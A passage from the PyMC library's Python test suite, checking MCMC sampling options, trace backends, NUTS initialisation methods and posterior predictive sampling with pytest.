np.all(idata12[\"x\"] != idata22[\"x\"])\n assert np.all(idata13[\"x\"] != idata23[\"x\"])\n\n def test_sample(self):\n test_cores = [1]\n with self.model:\n for cores in test_cores:\n for steps in [1, 10, 300]:\n pm.sample(\n steps,\n tune=0,\n step=self.step,\n cores=cores,\n random_seed=self.random_seed,\n )\n\n def test_sample_init(self):\n with self.model:\n for init in (\n \"advi\",\n \"advi_map\",\n \"map\",\n \"adapt_diag\",\n \"jitter+adapt_diag\",\n \"jitter+adapt_diag_grad\",\n \"adapt_full\",\n \"jitter+adapt_full\",\n ):\n pm.sample(\n init=init,\n tune=120,\n n_init=1000,\n draws=50,\n random_seed=self.random_seed,\n )\n\n def test_sample_args(self):\n with self.model:\n with pytest.raises(ValueError) as excinfo:\n pm.sample(50, tune=0, foo=1)\n assert \"'foo'\" in str(excinfo.value)\n\n with pytest.raises(ValueError) as excinfo:\n pm.sample(50, tune=0, foo={})\n assert \"foo\" in str(excinfo.value)\n\n def test_iter_sample(self):\n with self.model:\n samps = pm.sampling.iter_sample(\n draws=5,\n step=self.step,\n start=self.start,\n tune=0,\n random_seed=self.random_seed,\n )\n for i, trace in enumerate(samps):\n assert i == len(trace) - 1, \"Trace does not have correct length.\"\n\n def test_parallel_start(self):\n with self.model:\n idata = pm.sample(\n 0,\n tune=5,\n cores=2,\n discard_tuned_samples=False,\n start=[{\"x\": [10, 10]}, {\"x\": [-10, -10]}],\n random_seed=self.random_seed,\n )\n assert idata.warmup_posterior[\"x\"].sel(chain=0, draw=0).values[0] > 0\n assert idata.warmup_posterior[\"x\"].sel(chain=1, draw=0).values[0] < 0\n\n def test_sample_tune_len(self):\n with self.model:\n trace = pm.sample(draws=100, tune=50, cores=1, return_inferencedata=False)\n assert len(trace) == 100\n trace = pm.sample(\n draws=100, tune=50, cores=1, return_inferencedata=False, discard_tuned_samples=False\n )\n assert len(trace) == 150\n trace = pm.sample(draws=100, tune=50, cores=4, return_inferencedata=False)\n assert len(trace) == 100\n\n def test_reset_tuning(self):\n with self.model:\n tune = 50\n chains = 2\n start, step = pm.sampling.init_nuts(chains=chains, random_seed=[1, 2])\n pm.sample(draws=2, tune=tune, chains=chains, step=step, start=start, cores=1)\n assert step.potential._n_samples == tune\n assert step.step_adapt._count == tune + 1\n\n @pytest.mark.parametrize(\"step_cls\", [pm.NUTS, pm.Metropolis, pm.Slice])\n @pytest.mark.parametrize(\"discard\", [True, False])\n def test_trace_report(self, step_cls, discard):\n with 
self.model:\n # add more variables, because stats are 2D with CompoundStep!\n pm.Uniform(\"uni\")\n trace = pm.sample(\n draws=100,\n tune=50,\n cores=1,\n discard_tuned_samples=discard,\n step=step_cls(),\n compute_convergence_checks=False,\n return_inferencedata=False,\n )\n assert trace.report.n_tune == 50\n assert trace.report.n_draws == 100\n assert isinstance(trace.report.t_sampling, float)\n\n def test_return_inferencedata(self):\n with self.model:\n kwargs = dict(draws=100, tune=50, cores=1, chains=2, step=pm.Metropolis())\n\n # trace with tuning\n with pytest.warns(UserWarning, match=\"will be included\"):\n result = pm.sample(\n **kwargs, return_inferencedata=False, discard_tuned_samples=False\n )\n assert isinstance(result, pm.backends.base.MultiTrace)\n assert len(result) == 150\n\n # inferencedata with tuning\n result = pm.sample(**kwargs, return_inferencedata=True, discard_tuned_samples=False)\n assert isinstance(result, InferenceData)\n assert result.posterior.sizes[\"draw\"] == 100\n assert result.posterior.sizes[\"chain\"] == 2\n assert len(result._groups_warmup) > 0\n\n # inferencedata without tuning, with idata_kwargs\n prior = pm.sample_prior_predictive(return_inferencedata=False)\n result = pm.sample(\n **kwargs,\n return_inferencedata=True,\n discard_tuned_samples=True,\n idata_kwargs={\"prior\": prior},\n random_seed=-1,\n )\n assert \"prior\" in result\n assert isinstance(result, InferenceData)\n assert result.posterior.sizes[\"draw\"] == 100\n assert result.posterior.sizes[\"chain\"] == 2\n assert len(result._groups_warmup) == 0\n\n @pytest.mark.parametrize(\"cores\", [1, 2])\n def test_sampler_stat_tune(self, cores):\n with self.model:\n tune_stat = pm.sample(\n tune=5,\n draws=7,\n cores=cores,\n discard_tuned_samples=False,\n return_inferencedata=False,\n step=pm.Metropolis(),\n ).get_sampler_stats(\"tune\", chains=1)\n assert list(tune_stat).count(True) == 5\n assert list(tune_stat).count(False) == 7\n\n @pytest.mark.parametrize(\n \"start, error\",\n [\n ({\"x\": 1}, ValueError),\n ({\"x\": [1, 2, 3]}, ValueError),\n ({\"x\": np.array([[1, 1], [1, 1]])}, ValueError),\n ],\n )\n def test_sample_start_bad_shape(self, start, error):\n with pytest.raises(error):\n pm.sampling._check_start_shape(self.model, start)\n\n @pytest.mark.parametrize(\"start\", [{\"x\": np.array([1, 1])}, {\"x\": [10, 10]}, {\"x\": [-10, -10]}])\n def test_sample_start_good_shape(self, start):\n pm.sampling._check_start_shape(self.model, start)\n\n def test_sample_callback(self):\n callback = mock.Mock()\n test_cores = [1, 2]\n test_chains = [1, 2]\n with self.model:\n for cores in test_cores:\n for chain in test_chains:\n pm.sample(\n 10,\n tune=0,\n chains=chain,\n step=self.step,\n cores=cores,\n random_seed=self.random_seed,\n callback=callback,\n )\n assert callback.called\n\n def test_callback_can_cancel(self):\n trace_cancel_length = 5\n\n def callback(trace, draw):\n if len(trace) >= trace_cancel_length:\n raise KeyboardInterrupt()\n\n with self.model:\n trace = pm.sample(\n 10,\n tune=0,\n chains=1,\n step=self.step,\n cores=1,\n random_seed=self.random_seed,\n callback=callback,\n return_inferencedata=False,\n )\n assert len(trace) == trace_cancel_length\n\n def test_sequential_backend(self):\n with self.model:\n backend = NDArray()\n pm.sample(10, cores=1, chains=2, trace=backend)\n\n def test_exceptions(self):\n # Test iteration over MultiTrace NotImplementedError\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, 
observed=np.array([0.5, 0.2]))\n trace = pm.sample(tune=0, draws=10, chains=2, return_inferencedata=False)\n with pytest.raises(NotImplementedError):\n xvars = [t[\"mu\"] for t in trace]\n\n def test_deterministic_of_unobserved(self):\n with pm.Model() as model:\n x = pm.HalfNormal(\"x\", 1)\n y = pm.Deterministic(\"y\", x + 100)\n idata = pm.sample(\n chains=1,\n tune=10,\n draws=50,\n compute_convergence_checks=False,\n )\n\n np.testing.assert_allclose(idata.posterior[\"y\"], idata.posterior[\"x\"] + 100)\n\n def test_transform_with_rv_dependency(self):\n # Test that untransformed variables that depend on upstream variables are properly handled\n with pm.Model() as m:\n x = pm.HalfNormal(\"x\", observed=1)\n transform = pm.distributions.transforms.Interval(\n bounds_fn=lambda *inputs: (inputs[-2], inputs[-1])\n )\n y = pm.Uniform(\"y\", lower=0, upper=x, transform=transform)\n trace = pm.sample(tune=10, draws=50, return_inferencedata=False, random_seed=336)\n\n assert np.allclose(scipy.special.expit(trace[\"y_interval__\"]), trace[\"y\"])\n\n\ndef test_sample_find_MAP_does_not_modify_start():\n # see https://github.com/pymc-devs/pymc/pull/4458\n with pm.Model():\n pm.LogNormal(\"untransformed\")\n\n # make sure find_Map does not modify the start dict\n start = {\"untransformed\": 2}\n pm.find_MAP(start=start)\n assert start == {\"untransformed\": 2}\n\n # make sure sample does not modify the start dict\n start = {\"untransformed\": 0.2}\n pm.sample(draws=10, step=pm.Metropolis(), tune=5, start=start, chains=3)\n assert start == {\"untransformed\": 0.2}\n\n # make sure sample does not modify the start when passes as list of dict\n start = [{\"untransformed\": 2}, {\"untransformed\": 0.2}]\n pm.sample(draws=10, step=pm.Metropolis(), tune=5, start=start, chains=2)\n assert start == [{\"untransformed\": 2}, {\"untransformed\": 0.2}]\n\n\ndef test_empty_model():\n with pm.Model():\n pm.Normal(\"a\", observed=1)\n with pytest.raises(SamplingError) as error:\n pm.sample()\n error.match(\"any free variables\")\n\n\ndef test_partial_trace_sample():\n with pm.Model() as model:\n a = pm.Normal(\"a\", mu=0, sigma=1)\n b = pm.Normal(\"b\", mu=0, sigma=1)\n idata = pm.sample(trace=[a])\n assert \"a\" in idata.posterior\n assert \"b\" not in idata.posterior\n\n\ndef test_chain_idx():\n # see https://github.com/pymc-devs/pymc/issues/4469\n with pm.Model():\n mu = pm.Normal(\"mu\")\n x = pm.Normal(\"x\", mu=mu, sigma=1, observed=np.asarray(3))\n # note draws-tune must be >100 AND we need an observed RV for this to properly\n # trigger convergence checks, which is one particular case in which this failed\n # before\n idata = pm.sample(draws=150, tune=10, chain_idx=1)\n\n ppc = pm.sample_posterior_predictive(idata)\n # TODO FIXME: Assert something.\n ppc = pm.sample_posterior_predictive(idata, keep_size=True)\n\n\n@pytest.mark.parametrize(\n \"n_points, tune, expected_length, expected_n_traces\",\n [\n ((5, 2, 2), 0, 2, 3),\n ((6, 1, 1), 1, 6, 1),\n ],\n)\ndef test_choose_chains(n_points, tune, expected_length, expected_n_traces):\n with pm.Model() as model:\n a = pm.Normal(\"a\", mu=0, sigma=1)\n trace_0 = NDArray(model)\n trace_1 = NDArray(model)\n trace_2 = NDArray(model)\n trace_0.setup(n_points[0], 1)\n trace_1.setup(n_points[1], 1)\n trace_2.setup(n_points[2], 1)\n for _ in range(n_points[0]):\n trace_0.record({\"a\": 0})\n for _ in range(n_points[1]):\n trace_1.record({\"a\": 0})\n for _ in range(n_points[2]):\n trace_2.record({\"a\": 0})\n traces, length = pm.sampling._choose_chains([trace_0, 
trace_1, trace_2], tune=tune)\n assert length == expected_length\n assert expected_n_traces == len(traces)\n\n\n@pytest.mark.xfail(condition=(aesara.config.floatX == \"float32\"), reason=\"Fails on float32\")\nclass TestNamedSampling(SeededTest):\n def test_shared_named(self):\n G_var = shared(value=np.atleast_2d(1.0), broadcastable=(True, False), name=\"G\")\n\n with pm.Model():\n theta0 = pm.Normal(\n \"theta0\",\n mu=np.atleast_2d(0),\n tau=np.atleast_2d(1e20),\n size=(1, 1),\n initval=np.atleast_2d(0),\n )\n theta = pm.Normal(\n \"theta\", mu=at.dot(G_var, theta0), tau=np.atleast_2d(1e20), size=(1, 1)\n )\n res = theta.eval()\n assert np.isclose(res, 0.0)\n\n def test_shared_unnamed(self):\n G_var = shared(value=np.atleast_2d(1.0), broadcastable=(True, False))\n with pm.Model():\n theta0 = pm.Normal(\n \"theta0\",\n mu=np.atleast_2d(0),\n tau=np.atleast_2d(1e20),\n size=(1, 1),\n initval=np.atleast_2d(0),\n )\n theta = pm.Normal(\n \"theta\", mu=at.dot(G_var, theta0), tau=np.atleast_2d(1e20), size=(1, 1)\n )\n res = theta.eval()\n assert np.isclose(res, 0.0)\n\n def test_constant_named(self):\n G_var = at.constant(np.atleast_2d(1.0), name=\"G\")\n with pm.Model():\n theta0 = pm.Normal(\n \"theta0\",\n mu=np.atleast_2d(0),\n tau=np.atleast_2d(1e20),\n size=(1, 1),\n initval=np.atleast_2d(0),\n )\n theta = pm.Normal(\n \"theta\", mu=at.dot(G_var, theta0), tau=np.atleast_2d(1e20), size=(1, 1)\n )\n\n res = theta.eval()\n assert np.isclose(res, 0.0)\n\n\nclass TestChooseBackend:\n def test_choose_backend_none(self):\n with mock.patch(\"pymc.sampling.NDArray\") as nd:\n pm.sampling._choose_backend(None)\n assert nd.called\n\n def test_choose_backend_list_of_variables(self):\n with mock.patch(\"pymc.sampling.NDArray\") as nd:\n pm.sampling._choose_backend([\"var1\", \"var2\"])\n nd.assert_called_with(vars=[\"var1\", \"var2\"])\n\n def test_errors_and_warnings(self):\n with pm.Model():\n A = pm.Normal(\"A\")\n B = pm.Uniform(\"B\")\n strace = pm.sampling.NDArray(vars=[A, B])\n strace.setup(10, 0)\n\n with pytest.raises(ValueError, match=\"from existing MultiTrace\"):\n pm.sampling._choose_backend(trace=MultiTrace([strace]))\n\n strace.record({\"A\": 2, \"B_interval__\": 0.1})\n assert len(strace) == 1\n with pytest.raises(ValueError, match=\"Continuation of traces\"):\n pm.sampling._choose_backend(trace=strace)\n\n\nclass TestSamplePPC(SeededTest):\n def test_normal_scalar(self):\n nchains = 2\n ndraws = 500\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=0.0)\n trace = pm.sample(\n draws=ndraws,\n chains=nchains,\n return_inferencedata=False,\n )\n\n with model:\n # test list input\n ppc0 = pm.sample_posterior_predictive(\n [model.initial_point()], samples=10, return_inferencedata=False\n )\n # # deprecated argument is not introduced to fast version [2019/08/20:rpg]\n ppc = pm.sample_posterior_predictive(trace, var_names=[\"a\"], return_inferencedata=False)\n # test empty ppc\n ppc = pm.sample_posterior_predictive(trace, var_names=[], return_inferencedata=False)\n assert len(ppc) == 0\n\n # test keep_size parameter\n ppc = pm.sample_posterior_predictive(trace, keep_size=True, return_inferencedata=False)\n assert ppc[\"a\"].shape == (nchains, ndraws)\n\n # test default case\n ppc = pm.sample_posterior_predictive(trace, var_names=[\"a\"], return_inferencedata=False)\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (nchains * ndraws,)\n # mu's standard deviation may have changed thanks to a's observed\n _, pval = 
stats.kstest(ppc[\"a\"] - trace[\"mu\"], stats.norm(loc=0, scale=1).cdf)\n assert pval > 0.001\n\n def test_normal_scalar_idata(self):\n nchains = 2\n ndraws = 500\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=0.0)\n trace = pm.sample(\n draws=ndraws,\n chains=nchains,\n return_inferencedata=False,\n discard_tuned_samples=False,\n )\n\n assert not isinstance(trace, InferenceData)\n\n with model:\n # test keep_size parameter and idata input\n idata = pm.to_inference_data(trace)\n assert isinstance(idata, InferenceData)\n\n ppc = pm.sample_posterior_predictive(idata, keep_size=True, return_inferencedata=False)\n assert ppc[\"a\"].shape == (nchains, ndraws)\n\n def test_normal_vector(self, caplog):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n trace = pm.sample(return_inferencedata=False)\n\n with model:\n # test list input\n ppc0 = pm.sample_posterior_predictive(\n [model.initial_point()], return_inferencedata=False, samples=10\n )\n ppc = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=12, var_names=[]\n )\n assert len(ppc) == 0\n\n # test keep_size parameter\n ppc = pm.sample_posterior_predictive(trace, return_inferencedata=False, keep_size=True)\n assert ppc[\"a\"].shape == (trace.nchains, len(trace), 2)\n with pytest.warns(UserWarning):\n ppc = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=12, var_names=[\"a\"]\n )\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (12, 2)\n\n with pytest.warns(UserWarning):\n ppc = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=12, var_names=[\"a\"]\n )\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (12, 2)\n\n def test_normal_vector_idata(self, caplog):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n trace = pm.sample(return_inferencedata=False)\n\n assert not isinstance(trace, InferenceData)\n\n with model:\n # test keep_size parameter with inference data as input...\n idata = pm.to_inference_data(trace)\n assert isinstance(idata, InferenceData)\n\n ppc = pm.sample_posterior_predictive(idata, return_inferencedata=False, keep_size=True)\n assert ppc[\"a\"].shape == (trace.nchains, len(trace), 2)\n\n def test_exceptions(self, caplog):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n idata = pm.sample(idata_kwargs={\"log_likelihood\": False})\n\n with model:\n with pytest.raises(IncorrectArgumentsError):\n ppc = pm.sample_posterior_predictive(idata, samples=10, keep_size=True)\n\n # test wrong type argument\n bad_trace = {\"mu\": stats.norm.rvs(size=1000)}\n with pytest.raises(TypeError, match=\"type for `trace`\"):\n ppc = pm.sample_posterior_predictive(bad_trace)\n\n def test_vector_observed(self):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", mu=0, sigma=1)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.0, 1.0]))\n idata = pm.sample(idata_kwargs={\"log_likelihood\": False})\n\n with model:\n # test list input\n # ppc0 = pm.sample_posterior_predictive([model.initial_point], samples=10)\n # TODO: Assert something about the output\n # ppc = pm.sample_posterior_predictive(idata, samples=12, var_names=[])\n # assert len(ppc) == 0\n ppc = pm.sample_posterior_predictive(\n idata, return_inferencedata=False, samples=12, 
var_names=[\"a\"]\n )\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (12, 2)\n\n def test_sum_normal(self):\n with pm.Model() as model:\n a = pm.Normal(\"a\", sigma=0.2)\n b = pm.Normal(\"b\", mu=a)\n idata = pm.sample()\n\n with model:\n # test list input\n ppc0 = pm.sample_posterior_predictive(\n [model.initial_point()], return_inferencedata=False, samples=10\n )\n assert ppc0 == {}\n ppc = pm.sample_posterior_predictive(\n idata, return_inferencedata=False, samples=1000, var_names=[\"b\"]\n )\n assert len(ppc) == 1\n assert ppc[\"b\"].shape == (1000,)\n scale = np.sqrt(1 + 0.2**2)\n _, pval = stats.kstest(ppc[\"b\"], stats.norm(scale=scale).cdf)\n assert pval > 0.001\n\n def test_model_not_drawable_prior(self):\n data = np.random.poisson(lam=10, size=200)\n model = pm.Model()\n with model:\n mu = pm.HalfFlat(\"sigma\")\n pm.Poisson(\"foo\", mu=mu, observed=data)\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n idata = pm.sample(tune=10, draws=40, chains=1)\n\n with model:\n with pytest.raises(NotImplementedError) as excinfo:\n pm.sample_prior_predictive(50)\n assert \"Cannot sample\" in str(excinfo.value)\n samples = pm.sample_posterior_predictive(idata, 40, return_inferencedata=False)\n assert samples[\"foo\"].shape == (40, 200)\n\n def test_model_shared_variable(self):\n rng = np.random.RandomState(9832)\n\n x = rng.randn(100)\n y = x > 0\n x_shared = aesara.shared(x)\n y_shared = aesara.shared(y)\n with pm.Model() as model:\n coeff = pm.Normal(\"x\", mu=0, sigma=1)\n logistic = pm.Deterministic(\"p\", pm.math.sigmoid(coeff * x_shared))\n\n obs = pm.Bernoulli(\"obs\", p=logistic, observed=y_shared)\n trace = pm.sample(\n 100, return_inferencedata=False, compute_convergence_checks=False, random_seed=rng\n )\n\n x_shared.set_value([-1, 0, 1.0])\n y_shared.set_value([0, 0, 0])\n\n samples = 100\n with model:\n post_pred = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=samples, var_names=[\"p\", \"obs\"]\n )\n\n expected_p = np.array([logistic.eval({coeff: val}) for val in trace[\"x\"][:samples]])\n assert post_pred[\"obs\"].shape == (samples, 3)\n npt.assert_allclose(post_pred[\"p\"], expected_p)\n\n def test_deterministic_of_observed(self):\n rng = np.random.RandomState(8442)\n\n meas_in_1 = pm.aesaraf.floatX(2 + 4 * rng.randn(10))\n meas_in_2 = pm.aesaraf.floatX(5 + 4 * rng.randn(10))\n nchains = 2\n with pm.Model() as model:\n mu_in_1 = pm.Normal(\"mu_in_1\", 0, 2)\n sigma_in_1 = pm.HalfNormal(\"sd_in_1\", 1)\n mu_in_2 = pm.Normal(\"mu_in_2\", 0, 2)\n sigma_in_2 = pm.HalfNormal(\"sd__in_2\", 1)\n\n in_1 = pm.Normal(\"in_1\", mu_in_1, sigma_in_1, observed=meas_in_1)\n in_2 = pm.Normal(\"in_2\", mu_in_2, sigma_in_2, observed=meas_in_2)\n out_diff = in_1 + in_2\n pm.Deterministic(\"out\", out_diff)\n\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n trace = pm.sample(\n tune=100,\n draws=100,\n chains=nchains,\n step=pm.Metropolis(),\n return_inferencedata=False,\n compute_convergence_checks=False,\n random_seed=rng,\n )\n\n rtol = 1e-5 if aesara.config.floatX == \"float64\" else 1e-4\n\n ppc = pm.sample_posterior_predictive(\n return_inferencedata=False,\n model=model,\n trace=trace,\n samples=len(trace) * nchains,\n random_seed=0,\n var_names=[var.name for var in (model.deterministics + model.basic_RVs)],\n )\n\n npt.assert_allclose(ppc[\"in_1\"] + ppc[\"in_2\"], ppc[\"out\"], rtol=rtol)\n\n def test_deterministic_of_observed_modified_interface(self):\n rng = np.random.RandomState(4982)\n\n meas_in_1 = 
pm.aesaraf.floatX(2 + 4 * rng.randn(100))\n meas_in_2 = pm.aesaraf.floatX(5 + 4 * rng.randn(100))\n with pm.Model() as model:\n mu_in_1 = pm.Normal(\"mu_in_1\", 0, 1, initval=0)\n sigma_in_1 = pm.HalfNormal(\"sd_in_1\", 1, initval=1)\n mu_in_2 = pm.Normal(\"mu_in_2\", 0, 1, initval=0)\n sigma_in_2 = pm.HalfNormal(\"sd__in_2\", 1, initval=1)\n\n in_1 = pm.Normal(\"in_1\", mu_in_1, sigma_in_1, observed=meas_in_1)\n in_2 = pm.Normal(\"in_2\", mu_in_2, sigma_in_2, observed=meas_in_2)\n out_diff = in_1 + in_2\n pm.Deterministic(\"out\", out_diff)\n\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n trace = pm.sample(\n tune=100,\n draws=100,\n step=pm.Metropolis(),\n return_inferencedata=False,\n compute_convergence_checks=False,\n random_seed=rng,\n )\n varnames = [v for v in trace.varnames if v != \"out\"]\n ppc_trace = [\n dict(zip(varnames, row)) for row in zip(*(trace.get_values(v) for v in varnames))\n ]\n ppc = pm.sample_posterior_predictive(\n return_inferencedata=False,\n model=model,\n trace=ppc_trace,\n samples=len(ppc_trace),\n var_names=[x.name for x in (model.deterministics + model.basic_RVs)],\n )\n\n rtol = 1e-5 if aesara.config.floatX == \"float64\" else 1e-3\n npt.assert_allclose(ppc[\"in_1\"] + ppc[\"in_2\"], ppc[\"out\"], rtol=rtol)\n\n def test_variable_type(self):\n with pm.Model() as model:\n mu = pm.HalfNormal(\"mu\", 1)\n a = pm.Normal(\"a\", mu=mu, sigma=2, observed=np.array([1, 2]))\n b = pm.Poisson(\"b\", mu, observed=np.array([1, 2]))\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n trace = pm.sample(\n tune=10, draws=10, compute_convergence_checks=False, return_inferencedata=False\n )\n\n with model:\n ppc = pm.sample_posterior_predictive(trace, return_inferencedata=False, samples=1)\n assert ppc[\"a\"].dtype.kind == \"f\"\n assert ppc[\"b\"].dtype.kind == \"i\"\n\n def test_potentials_warning(self):\n warning_msg = \"The effect of Potentials on other parameters is ignored during\"\n with pm.Model() as m:\n a = pm.Normal(\"a\", 0, 1)\n p = pm.Potential(\"p\", a + 1)\n obs = pm.Normal(\"obs\", a, 1, observed=5)\n\n trace = az_from_dict({\"a\": np.random.rand(5)})\n with m:\n with pytest.warns(UserWarning, match=warning_msg):\n pm.sample_posterior_predictive(trace)\n\n def test_idata_extension(self):\n \"\"\"Testing if sample_posterior_predictive() extends inferenceData\"\"\"\n\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=[0.0, 1.0])\n idata = pm.sample(tune=10, draws=10, compute_convergence_checks=False)\n\n base_test_dict = {\n \"posterior\": [\"mu\", \"~a\"],\n \"sample_stats\": [\"diverging\", \"lp\"],\n \"log_likelihood\": [\"a\"],\n \"observed_data\": [\"a\"],\n }\n test_dict = {\"~posterior_predictive\": [], \"~predictions\": [], **base_test_dict}\n fails = check_multiple_attrs(test_dict, idata)\n assert not fails\n\n # extending idata with in-sample ppc\n with model:\n pm.sample_posterior_predictive(idata, extend_inferencedata=True)\n # test addition\n test_dict = {\"posterior_predictive\": [\"a\"], \"~predictions\": [], **base_test_dict}\n fails = check_multiple_attrs(test_dict, idata)\n assert not fails\n\n # extending idata with out-of-sample ppc\n with model:\n pm.sample_posterior_predictive(idata, extend_inferencedata=True, predictions=True)\n # test addition\n test_dict = {\"posterior_predictive\": [\"a\"], \"predictions\": [\"a\"], **base_test_dict}\n fails = check_multiple_attrs(test_dict, idata)\n assert not fails\n\n 
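# NOTE (editor's addition, a hedged sketch -- not part of the original PyMC test suite): the\n    # extend_inferencedata pattern exercised by test_idata_extension above looks like this in\n    # user code; the model and variable names below are invented purely for illustration.\n    #\n    #     with pm.Model():\n    #         x = pm.Normal(\"x\")\n    #         pm.Normal(\"obs\", mu=x, sigma=1, observed=[0.1, -0.3])\n    #         idata = pm.sample(tune=10, draws=10)\n    #         # mutates idata in place, adding a \"posterior_predictive\" group\n    #         pm.sample_posterior_predictive(idata, extend_inferencedata=True)\n    #     assert \"posterior_predictive\" in idata.groups()\n\n    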
@pytest.mark.parametrize(\"multitrace\", [False, True])\n def test_deterministics_out_of_idata(self, multitrace):\n draws = 10\n chains = 2\n coords = {\"draw\": range(draws), \"chain\": range(chains)}\n ds = xr.Dataset(\n {\n \"a\": xr.DataArray(\n [[0] * draws] * chains,\n coords=coords,\n dims=[\"chain\", \"draw\"],\n )\n },\n coords=coords,\n )\n with pm.Model() as m:\n a = pm.Normal(\"a\")\n if multitrace:\n straces = []\n for chain in ds.chain:\n strace = pm.backends.NDArray(model=m, vars=[a])\n strace.setup(len(ds.draw), int(chain))\n strace.values = {\"a\": ds.a.sel(chain=chain).data}\n strace.draw_idx = len(ds.draw)\n straces.append(strace)\n trace = MultiTrace(straces)\n else:\n trace = ds\n\n d = pm.Deterministic(\"d\", a - 4)\n pm.Normal(\"c\", d, sigma=0.01)\n ppc = pm.sample_posterior_predictive(trace, var_names=\"c\", return_inferencedata=True)\n assert np.all(np.abs(ppc.posterior_predictive.c + 4) <= 0.1)\n\n\n@pytest.mark.xfail(\n reason=\"sample_posterior_predictive_w not refactored for v4\", raises=NotImplementedError\n)\nclass TestSamplePPCW(SeededTest):\n def test_sample_posterior_predictive_w(self):\n data0 = np.random.normal(0, 1, size=50)\n warning_msg = \"The number of samples is too small to check convergence reliably\"\n\n with pm.Model() as model_0:\n mu = pm.Normal(\"mu\", mu=0, sigma=1)\n y = pm.Normal(\"y\", mu=mu, sigma=1, observed=data0)\n with pytest.warns(UserWarning, match=warning_msg):\n trace_0 = pm.sample(10, tune=0, chains=2, return_inferencedata=False)\n idata_0 = pm.to_inference_data(trace_0, log_likelihood=False)\n\n with pm.Model() as model_1:\n mu = pm.Normal(\"mu\", mu=0, sigma=1, size=len(data0))\n y = pm.Normal(\"y\", mu=mu, sigma=1, observed=data0)\n with pytest.warns(UserWarning, match=warning_msg):\n trace_1 = pm.sample(10, tune=0, chains=2, return_inferencedata=False)\n idata_1 = pm.to_inference_data(trace_1, log_likelihood=False)\n\n with pm.Model() as model_2:\n # Model with no observed RVs.\n mu = pm.Normal(\"mu\", mu=0, sigma=1)\n with pytest.warns(UserWarning, match=warning_msg):\n trace_2 = pm.sample(10, tune=0, return_inferencedata=False)\n\n traces = [trace_0, trace_1]\n idatas = [idata_0, idata_1]\n models = [model_0, model_1]\n\n ppc = pm.sample_posterior_predictive_w(traces, 100, models)\n assert ppc[\"y\"].shape == (100, 50)\n\n ppc = pm.sample_posterior_predictive_w(idatas, 100, models)\n assert ppc[\"y\"].shape == (100, 50)\n\n with model_0:\n ppc = pm.sample_posterior_predictive_w([idata_0.posterior], None)\n assert ppc[\"y\"].shape == (20, 50)\n\n with pytest.raises(ValueError, match=\"The number of traces and weights should be the same\"):\n pm.sample_posterior_predictive_w([idata_0.posterior], 100, models, weights=[0.5, 0.5])\n\n with pytest.raises(ValueError, match=\"The number of models and weights should be the same\"):\n pm.sample_posterior_predictive_w([idata_0.posterior], 100, models)\n\n with pytest.raises(\n ValueError, match=\"The number of observed RVs should be the same for all models\"\n ):\n pm.sample_posterior_predictive_w([trace_0, trace_2], 100, [model_0, model_2])\n\n def test_potentials_warning(self):\n warning_msg = \"The effect of Potentials on other parameters is ignored during\"\n with pm.Model() as m:\n a = pm.Normal(\"a\", 0, 1)\n p = pm.Potential(\"p\", a + 1)\n obs = pm.Normal(\"obs\", a, 1, observed=5)\n\n trace = az_from_dict({\"a\": np.random.rand(10)})\n with pytest.warns(UserWarning, match=warning_msg):\n pm.sample_posterior_predictive_w(samples=5, traces=[trace, trace], models=[m, 
m])\n\n\ndef check_exec_nuts_init(method):\n with pm.Model() as model:\n pm.Normal(\"a\", mu=0, sigma=1, size=2)\n pm.HalfNormal(\"b\", sigma=1)\n with model:\n start, _ = pm.init_nuts(init=method, n_init=10, random_seed=[1])\n assert isinstance(start, list)\n assert len(start) == 1\n assert isinstance(start[0], dict)\n assert set(start[0].keys()) == {v.name for v in model.value_vars}\n start, _ = pm.init_nuts(init=method, n_init=10, chains=2, random_seed=[1, 2])\n assert isinstance(start, list)\n assert len(start) == 2\n assert isinstance(start[0], dict)\n assert set(start[0].keys()) == {v.name for v in model.value_vars}\n\n\n@pytest.mark.parametrize(\n \"method\",\n [\n \"advi\",\n \"ADVI+adapt_diag\",\n \"advi_map\",\n \"jitter+adapt_diag\",\n \"adapt_diag\",\n \"map\",\n \"adapt_full\",\n \"jitter+adapt_full\",\n ],\n)\ndef test_exec_nuts_init(method):\n check_exec_nuts_init(method)\n\n\n@pytest.mark.skip(reason=\"Test requires monkey patching of RandomGenerator\")\n@pytest.mark.parametrize(\n \"initval, jitter_max_retries, expectation\",\n [\n (0, 0, pytest.raises(SamplingError)),\n (0, 1, pytest.raises(SamplingError)),\n (0, 4, does_not_raise()),\n (0, 10, does_not_raise()),\n (1, 0, does_not_raise()),\n ],\n)\ndef test_init_jitter(initval, jitter_max_retries, expectation):\n with pm.Model() as m:\n pm.HalfNormal(\"x\", transform=None, initval=initval)\n\n with expectation:\n # Starting value is negative (invalid) when np.random.rand returns 0 (jitter = -1)\n # and positive (valid) when it returns 1 (jitter = 